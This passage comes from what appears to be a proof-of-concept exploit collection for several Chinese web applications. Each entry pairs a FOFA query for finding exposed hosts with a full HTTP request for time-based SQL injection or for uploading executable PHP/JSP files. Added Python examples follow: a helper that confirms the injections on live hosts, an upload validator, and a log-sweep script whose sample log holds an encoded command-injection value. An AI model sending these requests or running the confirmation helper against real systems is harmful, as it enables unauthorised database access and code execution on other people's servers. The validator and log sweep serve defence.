Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then served at /storage/uploads/tttt.php (the POC's payload deletes itself after the first request).

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
Time-based: MySQL sleep(5) in the id value. Note that ac=del is the delete action, so run this against a copy where possible rather than production data.
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The injection is in TableName; decoded it reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, so a vulnerable host answers about five seconds late.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

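Entries 189, 191, 200 and 201 are all blind, time-based probes: the only signal is that the server answers about five seconds late. One slow reply is not evidence, because a loaded host, a cold cache or a WAF tarpit look the same. The helper below is an added example written for this page (not code from the page or from any vendor named on it): it alternates a benign value with the delayed value from the POC several times and confirms only when the fastest delayed answer is still slower than the slowest benign answer by most of the requested delay. The parameter values are the ones from the entries above; the HTTP sender, the probe URL and the simulated target are assumptions, and the clock is injectable so the logic can be exercised offline.

```python
"""Baseline-compared timing check for the time-based probes in entries 189,
191, 200 and 201.  Added example; sender and simulated target are assumptions,
the parameter values are the page's own."""
import time
from typing import Callable, Dict, Tuple

# (benign value, delayed value) pairs lifted from the POCs above:
# T-SQL WAITFOR for 189 and 191, MySQL sleep() for 200.
PROBES: Dict[str, Tuple[str, str]] = {
    "189 deleteStudy.php documentUniqueId": ("1", "1';WAITFOR DELAY '0:0:5'--"),
    "191 NavigationAjax id": ("1", "1'waitfor delay '0:0:5'--"),
    "200 dmku id": ("1", "(select(0)from(select(sleep(5)))v)"),
}


def timed(send: Callable[[str], None], value: str, clock: Callable[[], float]) -> float:
    """Seconds one request takes; the response body is irrelevant."""
    t0 = clock()
    send(value)
    return clock() - t0


def confirm_delay(send, benign, delayed, delay_s=5.0, rounds=3, margin=0.8,
                  clock=time.monotonic):
    """Alternate benign and delayed requests; confirm only if the fastest
    delayed answer is slower than the slowest benign answer by at least
    margin * delay_s.  Alternating keeps a load spike from landing entirely
    on one side of the comparison."""
    base, slow = [], []
    for _ in range(rounds):
        base.append(timed(send, benign, clock))
        slow.append(timed(send, delayed, clock))
    threshold = max(base) + margin * delay_s
    return {
        "baseline_max": round(max(base), 3),
        "delayed_min": round(min(slow), 3),
        "threshold": round(threshold, 3),
        "confirmed": min(slow) >= threshold,
    }


def http_get_sender(url_template: str, timeout: float = 30.0):
    """Real sender (assumed shape): url_template holds one {} where the
    parameter value goes, e.g. 'http://your-ip/xds/deleteStudy.php?documentUniqueId={}'."""
    import urllib.request
    from urllib.parse import quote

    def send(value: str) -> None:
        try:
            urllib.request.urlopen(url_template.format(quote(value, safe="")), timeout=timeout).read()
        except Exception:
            pass  # status codes and errors do not matter here, only elapsed time
    return send


class SimulatedTarget:
    """Constructed stand-in for offline use: a fake clock and a sender whose
    latency cycles through `jitter`, plus five extra seconds on injectable
    input when `vulnerable` is set."""
    def __init__(self, vulnerable: bool, base_latency: float = 0.3,
                 jitter=(0.0, 0.1, 0.2)):
        self.vulnerable = vulnerable
        self.base_latency = base_latency
        self.jitter = list(jitter)
        self.now = 0.0
        self.calls = 0

    def clock(self) -> float:
        return self.now

    def send(self, value: str) -> None:
        self.now += self.base_latency + self.jitter[self.calls % len(self.jitter)]
        self.calls += 1
        upper = value.upper()
        if self.vulnerable and ("WAITFOR" in upper or "SLEEP(" in upper):
            self.now += 5.0


if __name__ == "__main__":
    for label, (benign, delayed) in PROBES.items():
        target = SimulatedTarget(vulnerable=True)
        print(label, confirm_delay(target.send, benign, delayed, clock=target.clock))
```

For a real check, pass http_get_sender(...) as send and leave clock at its default; the margin of 0.8 tolerates a couple of seconds of jitter while still separating a genuine five-second delay from a merely slow host.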
202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace __VIEWSTATE and __EVENTVALIDATION below with the values taken from that page. The value 上传图片 is the literal caption of the upload button and is sent as-is.
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then served at /_data/Uploads/1123.txt
203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
The JSP is declared as image/jpeg; Content-Length 210 matches this body with CRLF line endings.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
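The upload POCs in entries 192, 194, 199, 202 and 203 each depend on one server-side mistake: the extension comes from a client parameter (name=.ashx), the declared Content-Type is trusted (image/jpeg wrapped around 11.jsp), or the client's filename is joined into a path (../../../../../jboss/web/fe.war/hello.jsp). The validator below is an added example written for this page, not code from any product named on it, and shows the handling that stops all five: keep only the last path component, allow-list the extension, check the magic bytes instead of the declared type, and let the server choose the stored name. The allow-list and the upload root are assumptions. Entry 202's 1123.txt passes as harmless data; what the generated name removes there is the caller's control over the stored name.

```python
"""Upload validation that rejects the file parts used in entries 192, 194, 199
and 203 and stores 202's text file under a server-chosen name.  Added example,
not code from any product on this page; allow-list and root are assumptions."""
import os
import secrets
from pathlib import Path

# extension -> required leading bytes.  None: no magic, allowed only because a
# web server hands .txt back as data rather than executing it.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
    ".txt": None,
}
SCRIPT_MARKERS = (b"<?php", b"<%", b"<script")


class UploadRejected(ValueError):
    pass


def base_name(filename: str) -> str:
    """Keep only the last path component, whichever separator the client used."""
    return filename.replace("\\", "/").rsplit("/", 1)[-1].strip()


def validate_upload(filename: str, declared_type: str, data: bytes) -> str:
    """Return the extension the file may be stored with, or raise.
    declared_type is deliberately not part of the decision: entry 203 sends
    a JSP as image/jpeg."""
    name = base_name(filename)
    if not name or name.startswith("."):
        raise UploadRejected(f"unusable file name {filename!r}")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed (declared {declared_type})")
    magic = ALLOWED[ext]
    if magic is not None and not data.startswith(magic):
        raise UploadRejected(f"content is not {ext}")
    if magic is None and any(m in data.lower() for m in SCRIPT_MARKERS):
        raise UploadRejected("script markers in a plain-text upload")
    return ext


def stored_path(upload_root: str, ext: str) -> Path:
    """Server-chosen name; the containment check is belt and braces, since no
    client-controlled string reaches the path at all."""
    root = Path(upload_root).resolve()
    dest = (root / (secrets.token_hex(16) + ext)).resolve()
    if dest.parent != root:
        raise UploadRejected("destination escaped the upload root")
    return dest


def rejected(filename: str, declared_type: str, data: bytes) -> bool:
    try:
        validate_upload(filename, declared_type, data)
    except UploadRejected:
        return True
    return False


# The file parts exactly as the POCs above send them.
POC_VECTORS = [
    (".ashx", "application/x-www-form-urlencoded",
     b'<% @ webhandler language="C#" class="AverageHandler" %>'),          # 192: extension from ?name=
    ("../../../../../jboss/web/fe.war/hello.jsp", "text/plain",
     b'<% out.println("hello");%>'),                                     # 194: traversal in filename
    ("tttt.php", "text/php", b'<?php echo "tttt";unlink(__FILE__);?>'),   # 199
    ("11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>'),            # 203: Content-Type lies
]

if __name__ == "__main__":
    for fname, ctype, body in POC_VECTORS:
        print(fname, "rejected" if rejected(fname, ctype, body) else "accepted")
    print(validate_upload("1123.txt", "text/plain", b"Hello World!"), stored_path(".", ".txt").name)
```

The order of the checks matters: the extension is decided from the cleaned name before anything else is looked at, so neither the ?name= parameter of entry 192 nor a double extension can reintroduce an executable suffix, and the magic check is only reached for files that are already allowed.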
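The introduction asks defenders to use this list for risk checks, and the cheapest retrospective check is a sweep of web access logs for the request shapes in entries 188 to 203. A naive grep misses several of them: 191 reaches NavigationAjax through /js/../, 197 appends ;.js to the servlet path, 198 percent-encodes its backticks and 189 encodes its quotes. The script below is an added example written for this page (not code from the page or any vendor on it): it decodes each request target, strips per-segment ;parameters, collapses dot segments and lower-cases the path before comparing it with the rule list, and evaluates query features separately. Payloads that travel in a POST body (190, 191, 193, 201 and the uploads) leave nothing in the query, so those rules are path-only hunting leads that need the source IP and timing for context; the remaining rules carry a query feature and count as indicators. The log lines in SAMPLE_LOG are constructed; the request targets in them are the ones from the POCs above.

```python
"""Access-log sweep for the request shapes in entries 188 to 203.  Added
example, not code from the page; SAMPLE_LOG is constructed, RULES are the
paths and payload features visible in the POCs above."""
import posixpath
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# (label, method, path as written in the POC, regex over the decoded query or None).
# Rules without a query regex are hunting leads: the path is also used legitimately.
RULES = [
    ("189 LANWON deleteStudy SQLi", "GET", "/xds/deleteStudy.php", r"waitfor\s+delay|sleep\("),
    ("190 poihuoqu file read", "POST", "/index.php/admin/Userinfo/poihuoqu", None),
    ("191 CDGServer3 NavigationAjax SQLi", "POST", "/CDGServer3/NavigationAjax", None),
    ("192 UploadEmailAttr .ashx upload", "POST", "/JoinfApp/EMail/UploadEmailAttr", r"name=\.ashx"),
    ("193 setSystemTimeAction command execution", "POST", "/master/ajaxActions/setSystemTimeAction.php", None),
    ("194 uploadAttachmentServlet upload", "POST", "/servlet/uploadAttachmentServlet", None),
    ("195 send_order.cgi command execution", "POST", "/send_order.cgi", r"parameter=operation"),
    ("196 resetPasswordBySuper", "POST", "/cas/userCtl/resetPasswordBySuper", None),
    ("197 Quotegask_editAction SQLi", "GET", "/entsoft/Quotegask_editAction.entweb", r"union\s+(all\s+)?select"),
    ("198 aliyundrive-webdav sid injection", "GET", "/cgi-bin/luci/admin/services/aliyundrive-webdav/query", r"sid=[^&]*[`$;|]"),
    ("199 cockpit assetsmanager upload", "POST", "/assetsmanager/upload", None),
    ("200 SeaCMS dmku SQLi", "GET", "/js/player/dmplayer/dmku/", r"sleep\(|benchmark\(|waitfor"),
    ("201 binary.do SQLi", "POST", "/newsedit/newsplan/task/binary.do", None),
    ("202 AccountEdit upload", "POST", "/User/AccountEdit.aspx", None),
    ("203 PtFjk upload", "POST", "/RedseaPlatform/PtFjk.mob", r"method=upload"),
]

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def normalize_path(path: str) -> str:
    """Decode twice (double encoding costs an attacker nothing), drop ;params
    from each segment, collapse dot segments and lower-case."""
    decoded = unquote(unquote(path))
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    joined = re.sub(r"/+", "/", "/" + "/".join(segments))
    return posixpath.normpath(joined).lower()


COMPILED = [(label, method, normalize_path(path), re.compile(rx, re.I) if rx else None)
            for label, method, path, rx in RULES]


def match_line(line: str):
    """First rule that fits the line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = normalize_path(parts.path)
    query = unquote_plus(unquote_plus(parts.query))
    for label, method, rule_path, rx in COMPILED:
        if m["method"] != method or path != rule_path:
            continue
        if rx and not rx.search(query):
            continue
        return {"rule": label, "ip": m["ip"], "status": m["status"], "target": m["target"],
                "confidence": "indicator" if rx else "lead"}
    return None


def scan(lines):
    return [hit for hit in map(match_line, lines) if hit]


# Constructed sample; the request targets are the ones from the POCs above.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:07:41:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 311',
    '203.0.113.7 - - [05/Jun/2024:07:41:09 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88',
    '203.0.113.7 - - [05/Jun/2024:07:41:15 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 40',
    '203.0.113.7 - - [05/Jun/2024:07:41:22 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 12',
    '198.51.100.20 - - [05/Jun/2024:07:42:00 +0800] "GET /User/AccountEdit.aspx HTTP/1.1" 200 5120',
    '198.51.100.20 - - [05/Jun/2024:07:42:03 +0800] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["confidence"], hit["rule"], hit["ip"], hit["target"])
```

Feed it real logs with scan(open(path)) and group hits by source IP: a single address producing several leads within seconds, as in the sample, is the pattern a POC sweep leaves behind, while one lead on its own is usually ordinary use of that page.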